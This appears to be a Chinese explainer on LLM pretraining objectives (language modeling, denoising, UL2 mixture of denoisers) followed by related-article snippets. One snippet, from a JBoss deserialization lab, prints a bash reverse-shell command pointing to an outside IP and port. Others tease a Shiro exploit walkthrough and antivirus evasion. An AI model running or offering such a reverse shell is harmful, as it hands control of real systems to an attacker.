大模型-模型预训练-预训练任务

一、简介

1、预训练任务目的

设计合适的自监督训练任务,使得模型能够从海量五标注数据中学习到广泛的语义知识与世界知识

2、常见预训练任务
  • 语言建模
  • 去噪自编码
  • 混合去噪器

二、语言建模

1、特点
  • 被目前绝大多数模型采用
  • 核心在于预测下一个词元
  • 经常被用于训练基于解码器架构的大模型
  • 是一种多任务学习过程,可同时学习到生成时用到的相关知识与能力
2、任务内容

基于前序内容生成或预测后续内容

3、变种
  • 前缀语言建模
    • 特点:主要应用与采用前缀解码器架构的大模型
    • 缺点:由于总损失仅计算后缀词元,性能稍逊于使用标准语言建模任务进行预训练的模型
  • 中间任务填充
    • 任务内容:训练模型对于中间部分文本的预测生成能力
    • 特点:
      • 常用于作为标准语言建模任务的辅助任务
      • 通常用于训练代码预训练模型,提升模型代码补全能力
4、应用情况
  • 应用范围:被绝大部分大模型采用
  • 代表模型:GPT

三、去噪自编码

1、特点
  • 实现比语言建模复杂,需要设定额外的优化策略,如词元替换策略、替换片段长度、替换词元比例
2、任务内容

输入文本经过一系列替换或删除,形成损坏文本,模型任务目标是根据损坏文本恢复出被替换或删除的片段

3、应用情况
  • 应用范围:比语言建模应用少
  • 代表模型:BERT、T5等模型

四、混合去噪器

1、任务内容

又称UL2损失,通过将语言建模和去噪自编码的目标均视为不同的去噪任务,对于预训练任务进行了统一建模

2、组成
  • S-去噪器
  • R-去噪器
  • X-去噪器
3、特点
  • S-去噪器与前缀语言建模目标相同
  • R-去噪器、X-去噪器与去噪自编码目标相似,二者在被掩盖(删除)片段的跨度以及损坏比例上有区别,R-去噪器掩盖比例约为15%,每个被掩盖片段包含3-5个词元;X-去噪器掩盖比例约为50%,每个被掩盖片段包含12个词元以上
4、如何选择去噪器

在句子开头设置特定词元(比如R、X、S)标记去噪器类型

5、应用情况
  • 应用范围:较小
  • 代表模型:UL2、PaLM2等

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1543481.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

开源模型应用落地-Qwen2.5-Coder模型小试-码无止境(一)

一、前言 代码专家模型是一种基于人工智能的先进技术,旨在自动分析和理解大量代码库,并从中学习常见的编码模式和最佳实践。这种模型通过深度学习和自然语言处理,能够提供准确而高效的代码建议,帮助开发人员在编写代码时有效地避免…

[ComfyUI]Flux:太美啦!绮梦流光-水湄凝香,写实与虚拟混合,极致细节和质感

大家好我是安琪!!! 在数字艺术和创意领域,[ComfyUI]Flux已经成为艺术家和设计师们手中的利器。今天,我们激动地宣布,[ComfyUI]Flux带来了一款令人瞩目的创新作品——绮梦流光-水湄凝香。这款作品将写实与虚…

怎么把kgm转换成mp3?5个kgm转mp3的方法,亲测管用!

很多小伙伴不难发现kgm格式只能在固定的平台或设备上播放,如果想要打破这一限制,我们可以将kgm格式转换为兼容性较强的mp3格式。 下面,就来给大家分享5个好用的kgm转mp3方法,操作简单,小白也能分分钟学会哦~ kgm转mp3…

全民皆信奥?编程教育不应成为‘金牌梦’的牺牲品

近年来,信息学奥赛(信奥)成为众多家长为孩子规划的学习目标之一,期望通过编程学习在未来脱颖而出,甚至进入清华、北大等顶尖高校。然而,是否每个孩子都适合走这条信息学奥赛的道路?全民皆信奥是…

多机器学习模型学习

特征处理 import os import numpy as np import pandas as pd from sklearn.model_selection import train_test_split from sklearn.model_selection import StratifiedShuffleSplit from sklearn.impute import SimpleImputer from sklearn.pipeline import FeatureUnion fr…

JBOSS中间件漏洞复现

CVE-2015-7501 1.开启环境 cd vulhub/jboss/JMXInvokerServlet-deserialization docker-compose up -d docker ps 2.访问靶场 3.访问/invoker/JMXInvokerServlet目录 4.将反弹shell进⾏base64编码 bash -i >& /dev/tcp/47.121.191.208/6666 0>&1 YmFzaCAt…

MySQL之基本查询(二)(update || delete || 聚合函数 || group by)

目录 一、表的更新update 二、表的删除delete 三、聚合函数 四、group by 分组查询 一、表的更新update 语法: UPDATE table_name SET column expr [, column expr ...] [WHERE ...] [ORDER BY ...] [LIMIT ...] 使用实列: ~ 将孙悟空同学的数学…

Shiro rememberMe反序列化漏洞(Shiro-550) 靶场攻略

漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),⽤户登录成功后会⽣成经过 加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反 序列化,就导致了反序列化RCE漏洞。 那么&a…

杀软对抗 ---> Perfect Syscall??

好久没更了,今天想起来更新了😋😋😋😋 目录 1.AV && EDR 2.Perfect Syscall?? 3.Truly Perfect ??? 在开始之前先来展示一下这次的免杀效果 1.AV && EDR 360 天擎EDR …

Redis事务总结

1.事务介绍 Redis 事务是一个用于将多个命令打包在一起执行的功能,它可以确保这些命令按照顺序执行,并且具有原子性。这意味着事务中的命令要么全部执行,要么全部不执行,这有助于保持数据的一致性。 Redis 事务本质:…

教你轻松搞定西门子PLC与三菱PLC之间无线Modbus通讯

自第一台PLC在GM公司汽车生产线上首次应用成功以来,PLC凭借其方便性、可靠性以及低廉的价格得到了广泛的应用。在现代化工厂中,除厂级PLC系统外,还存在很多独立的子系统。比如,各个生产车间的PLC系统、或同一生产车间的不同生产流…

JavaSE高级(3)——lombok、juint单元测试、断言

一、lombok的使用 默认jvm不解析第三方注解,需要手动开启 链式调用 二、juint单元测试 下载juint包 public class TestDemo {// 在每一个单元测试方法执行之前执行Beforepublic void before() {// 例如可以在before部分创建IO流System.out.println("befor…

【大模型实战篇】大模型GPU推理测试(以Qwen2.5-7B为例)

1. 背景介绍 今天到了两块新的3090卡,用nvidia-smi看下部署情况。我们使用Qwen2.5-7B简单做了下推理测试。 3090卡的基本配置信息如下图所示,使用两块卡做成GPU集群,显存有48G,内存带宽936.2 GB/s, 基本上可以应对…

【OpenCV】场景中人的识别与前端计数

1.OpenCV代码设计讲解 突发奇想,搞个摄像头,识别一下实验室里面有几个人,计数一下(最终代码是累加计数,没有优化),拿OpenCV来玩一玩 首先,还是优先启动电脑摄像头,本项…

实验十七:串口通信实验

串口通信实验硬件接口图 具体原理可以查看相应的资料和视频 现就代码分享如下; main.c #include<reg52.h>typedef unsigned int u16; typedef unsigned char u8;sbit LED1=P2^0;void delay_10us(u16 n) {while(n--); }int n=0;void delay_ms(u16 ms) {u16 i,j;for(i=…

在线思维导图怎么制作?只需要台这些组合分析法!

思维导图经历了漫长的进化&#xff0c;现已成为信息组织、记忆和头脑风暴的重要工具。其制作方式主要有手绘和软件两种&#xff0c;随着互联网的发展&#xff0c;软件制作因其便捷性和易于保存逐渐占据主导。如今&#xff0c;在线工具使得用户能够免费创建思维导图。本文将以即…

实验十八:IIC-EEPROM实验

这个实验比较复杂,是目前第一个多文件项目 KEY1-4:P3^0-P3^3 IIC_SCL=P2^1; IIC_SDA=P2^0; //定义数码管位选信号控制脚 LSA=P2^2; LSB=P2^3; LSC=P2^4; 代码 main.c #include "public.h" #in

写作文的AI,不妨试试这些工具

写作文的AI&#xff0c;随着人工智能技术的迅猛发展&#xff0c;AI写作软件已经成为许多作家、学生和内容创作者的得力助手。这些软件不仅能帮助用户生成高质量的文章&#xff0c;还能提供创意灵感、语法校正和内容优化等多重功能。下面&#xff0c;本文将介绍五款各具特色的AI…

真正能抵抗裁员的,从不是专业能力,早知道这些都财务自由了

‍‍‍‍前几天跟一位朋友聊起来。 说她在大厂工作接近5年&#xff0c;业绩也不错&#xff0c;本想着再熬几年就回老家发展。没想到&#xff0c;今年公司大幅裁员&#xff0c;项目组直接被连锅端。 本以为不会轮到她了&#xff0c;上午被叫去办公室谈话&#xff0c;签字&…

高温情况下电容器失效的解决措施

在高温环境下&#xff0c;电容器容易出现失效问题&#xff0c;这不仅会影响设备的正常运行&#xff0c;还可能引发安全隐患。为有效应对高温条件下电容器的失效&#xff0c;需从预防、监测、选择合适的电容器以及维护保养等多个方面入手。以下是详细的解决措施&#xff1a; 一…